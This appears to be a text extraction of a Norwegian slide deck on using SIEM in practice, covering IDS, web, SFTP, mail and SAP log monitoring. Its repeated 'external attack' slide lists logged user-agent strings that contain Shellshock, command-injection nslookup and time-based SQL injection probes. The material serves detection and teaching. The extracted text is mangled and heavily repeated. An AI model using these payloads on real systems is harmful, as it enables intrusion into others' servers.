Kritiske og sensitive data

SAP Security Audit Log

Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner

Visualisert Klassifisering kvantaDetalj eksakt type

SAP Router

Setter opp aksess mellom klient og sap infrastruktur

ACL regulert ift klient node og applikasjon

Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106

Router contrsquod

Brudd paring policy visualisert

Read Access LogDriver er ofte regulatoriske krav og offentlige standarder

Full overvaringkning av les og aksess av sensitive data

TBD

Case - eksternt angrep

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 8: Security Information and Event Management (SIEM) i praksis

Ulike datakilder

IDS - Intrusion Detection System Suricata Snort Fail2ban

Web Apache NGINX IIS

FTP vsftpd sftp

Brannmur IPtables packetfilter Cisco ASA FortiGate

Epost Qmail postfix

SAP

IDS

Suricata - multitraringdet IDS

Regler paring protokoll

HTTP normalizer og parser

Overvaringkning opp til L7 OSI

Output JSON direkte

Web

Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen

Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul

Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip

Fil via SSL og SSH

Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner

Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes

Angrepsvektor reduseres med enkle midler som feks fail2ban

Distribuerte bruteforce sees relativt enkelt med SIEM

Geoip og plassering paring kart lar oss obeservere unormale hotspots

forsoslashk paring injections

Operativsystem

Eksempel paring brukerinnlogging fra brukeren icinga

Mail

Sjekk av volum

Sjekk av antall mail per koslash

Teller ogsaring antall ikke-leverte mails

Kan ta dette lenger ift spamhaus og maskinlaeligre

SAP

SAP - Systems Applications amp Products

Enkelt forklart haringndterer forretning penger HR varer logistikk etc

Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder

Tidskritisk dersom SAP benyttes ifm produksjon

Kritiske og sensitive data

SAP Security Audit Log

Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner

Visualisert Klassifisering kvantaDetalj eksakt type

SAP Router

Setter opp aksess mellom klient og sap infrastruktur

ACL regulert ift klient node og applikasjon

Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106

Router contrsquod

Brudd paring policy visualisert

Read Access LogDriver er ofte regulatoriske krav og offentlige standarder

Full overvaringkning av les og aksess av sensitive data

TBD

Case - eksternt angrep

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 9: Security Information and Event Management (SIEM) i praksis

IDS

Suricata - multitraringdet IDS

Regler paring protokoll

HTTP normalizer og parser

Overvaringkning opp til L7 OSI

Output JSON direkte

Web

Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen

Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul

Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip

Fil via SSL og SSH

Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner

Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes

Angrepsvektor reduseres med enkle midler som feks fail2ban

Distribuerte bruteforce sees relativt enkelt med SIEM

Geoip og plassering paring kart lar oss obeservere unormale hotspots

forsoslashk paring injections

Operativsystem

Eksempel paring brukerinnlogging fra brukeren icinga

Mail

Sjekk av volum

Sjekk av antall mail per koslash

Teller ogsaring antall ikke-leverte mails

Kan ta dette lenger ift spamhaus og maskinlaeligre

SAP

SAP - Systems Applications amp Products

Enkelt forklart haringndterer forretning penger HR varer logistikk etc

Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder

Tidskritisk dersom SAP benyttes ifm produksjon

Kritiske og sensitive data

SAP Security Audit Log

Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner

Visualisert Klassifisering kvantaDetalj eksakt type

SAP Router

Setter opp aksess mellom klient og sap infrastruktur

ACL regulert ift klient node og applikasjon

Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106

Router contrsquod

Brudd paring policy visualisert

Read Access LogDriver er ofte regulatoriske krav og offentlige standarder

Full overvaringkning av les og aksess av sensitive data

TBD

Case - eksternt angrep

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 10: Security Information and Event Management (SIEM) i praksis

Web

Aksess logger klient IP HTTP kall HTTP status kode tidspunkt user agent stoslashrrelse paring foresposlashrselen

Error logger klient IP HTTP kall tidspunkt feilmelding evt intern modul

Interne foresposlashrsler klient IP HTTP kall tidspunkt hellip

Fil via SSL og SSH

Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner

Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes

Angrepsvektor reduseres med enkle midler som feks fail2ban

Distribuerte bruteforce sees relativt enkelt med SIEM

Geoip og plassering paring kart lar oss obeservere unormale hotspots

forsoslashk paring injections

Operativsystem

Eksempel paring brukerinnlogging fra brukeren icinga

Mail

Sjekk av volum

Sjekk av antall mail per koslash

Teller ogsaring antall ikke-leverte mails

Kan ta dette lenger ift spamhaus og maskinlaeligre

SAP

SAP - Systems Applications amp Products

Enkelt forklart haringndterer forretning penger HR varer logistikk etc

Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder

Tidskritisk dersom SAP benyttes ifm produksjon

Kritiske og sensitive data

SAP Security Audit Log

Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner

Visualisert Klassifisering kvantaDetalj eksakt type

SAP Router

Setter opp aksess mellom klient og sap infrastruktur

ACL regulert ift klient node og applikasjon

Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106

Router contrsquod

Brudd paring policy visualisert

Read Access LogDriver er ofte regulatoriske krav og offentlige standarder

Full overvaringkning av les og aksess av sensitive data

TBD

Case - eksternt angrep

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 11: Security Information and Event Management (SIEM) i praksis

Fil via SSL og SSH

Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner

Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes

Angrepsvektor reduseres med enkle midler som feks fail2ban

Distribuerte bruteforce sees relativt enkelt med SIEM

Geoip og plassering paring kart lar oss obeservere unormale hotspots

forsoslashk paring injections

Operativsystem

Eksempel paring brukerinnlogging fra brukeren icinga

Mail

Sjekk av volum

Sjekk av antall mail per koslash

Teller ogsaring antall ikke-leverte mails

Kan ta dette lenger ift spamhaus og maskinlaeligre

SAP

SAP - Systems Applications amp Products

Enkelt forklart haringndterer forretning penger HR varer logistikk etc

Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder

Tidskritisk dersom SAP benyttes ifm produksjon

Kritiske og sensitive data

SAP Security Audit Log

Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner

Visualisert Klassifisering kvantaDetalj eksakt type

SAP Router

Setter opp aksess mellom klient og sap infrastruktur

ACL regulert ift klient node og applikasjon

Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106

Router contrsquod

Brudd paring policy visualisert

Read Access LogDriver er ofte regulatoriske krav og offentlige standarder

Full overvaringkning av les og aksess av sensitive data

TBD

Case - eksternt angrep

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 12: Security Information and Event Management (SIEM) i praksis

Operativsystem

Eksempel paring brukerinnlogging fra brukeren icinga

Mail

Sjekk av volum

Sjekk av antall mail per koslash

Teller ogsaring antall ikke-leverte mails

Kan ta dette lenger ift spamhaus og maskinlaeligre

SAP

SAP - Systems Applications amp Products

Enkelt forklart haringndterer forretning penger HR varer logistikk etc

Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder

Tidskritisk dersom SAP benyttes ifm produksjon

Kritiske og sensitive data

SAP Security Audit Log

Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner

Visualisert Klassifisering kvantaDetalj eksakt type

SAP Router

Setter opp aksess mellom klient og sap infrastruktur

ACL regulert ift klient node og applikasjon

Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106

Router contrsquod

Brudd paring policy visualisert

Read Access LogDriver er ofte regulatoriske krav og offentlige standarder

Full overvaringkning av les og aksess av sensitive data

TBD

Case - eksternt angrep

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 13: Security Information and Event Management (SIEM) i praksis

Mail

Sjekk av volum

Sjekk av antall mail per koslash

Teller ogsaring antall ikke-leverte mails

Kan ta dette lenger ift spamhaus og maskinlaeligre

SAP

SAP - Systems Applications amp Products

Enkelt forklart haringndterer forretning penger HR varer logistikk etc

Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder

Tidskritisk dersom SAP benyttes ifm produksjon

Kritiske og sensitive data

SAP Security Audit Log

Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner

Visualisert Klassifisering kvantaDetalj eksakt type

SAP Router

Setter opp aksess mellom klient og sap infrastruktur

ACL regulert ift klient node og applikasjon

Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106

Router contrsquod

Brudd paring policy visualisert

Read Access LogDriver er ofte regulatoriske krav og offentlige standarder

Full overvaringkning av les og aksess av sensitive data

TBD

Case - eksternt angrep

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 14: Security Information and Event Management (SIEM) i praksis

SAP

SAP - Systems Applications amp Products

Enkelt forklart haringndterer forretning penger HR varer logistikk etc

Alt fra enkle oslashkosystemer til store komplekse som innbefatter flere hundre noder

Tidskritisk dersom SAP benyttes ifm produksjon

Kritiske og sensitive data

SAP Security Audit Log

Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner

Visualisert Klassifisering kvantaDetalj eksakt type

SAP Router

Setter opp aksess mellom klient og sap infrastruktur

ACL regulert ift klient node og applikasjon

Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106

Router contrsquod

Brudd paring policy visualisert

Read Access LogDriver er ofte regulatoriske krav og offentlige standarder

Full overvaringkning av les og aksess av sensitive data

TBD

Case - eksternt angrep

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 15: Security Information and Event Management (SIEM) i praksis

SAP Security Audit Log

Sikkerhetmessige hendelser Endringer av kontoer og aksess Endring av master data Endringer av auditing Start og stopp av transaksjoner

Visualisert Klassifisering kvantaDetalj eksakt type

SAP Router

Setter opp aksess mellom klient og sap infrastruktur

ACL regulert ift klient node og applikasjon

Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106

Router contrsquod

Brudd paring policy visualisert

Read Access LogDriver er ofte regulatoriske krav og offentlige standarder

Full overvaringkning av les og aksess av sensitive data

TBD

Case - eksternt angrep

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 16: Security Information and Event Management (SIEM) i praksis

SAP Router

Setter opp aksess mellom klient og sap infrastruktur

ACL regulert ift klient node og applikasjon

Thu Apr 14 135800 2016 DISCONNECT S96686049 host 102207853200 (10220785) Thu Apr 14 135802 2016 CONNECT FROM C9669- host 1952451936212801 Thu Apr 14 135802 2016 DISCONNECT C9669- host 1952451936212801 (19524519362) Thu Apr 14 135806 2016 DISCONNECT S24177755 host 102207853200 (10220785) Thu Apr 14 135807 2016 CONNECT FROM C2418- host 1952451936212802 Thu Apr 14 135807 2016 DISCONNECT C2418- host 1952451936212802 (19524519362) Thu Apr 14 135808 2016 DISCONNECT S738510105 host 1022072043200 (102207204) Thu Apr 14 135808 2016 CONNECT FROM C7386- host 14625418614552033 Thu Apr 14 135808 2016 CONNECT TO S738610106 host 10220784sapgw91 (cizep) Thu Apr 14 135808 2016 ESTABLISHED S738610106

Router contrsquod

Brudd paring policy visualisert

Read Access LogDriver er ofte regulatoriske krav og offentlige standarder

Full overvaringkning av les og aksess av sensitive data

TBD

Case - eksternt angrep

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 17: Security Information and Event Management (SIEM) i praksis

Router contrsquod

Brudd paring policy visualisert

Read Access LogDriver er ofte regulatoriske krav og offentlige standarder

Full overvaringkning av les og aksess av sensitive data

TBD

Case - eksternt angrep

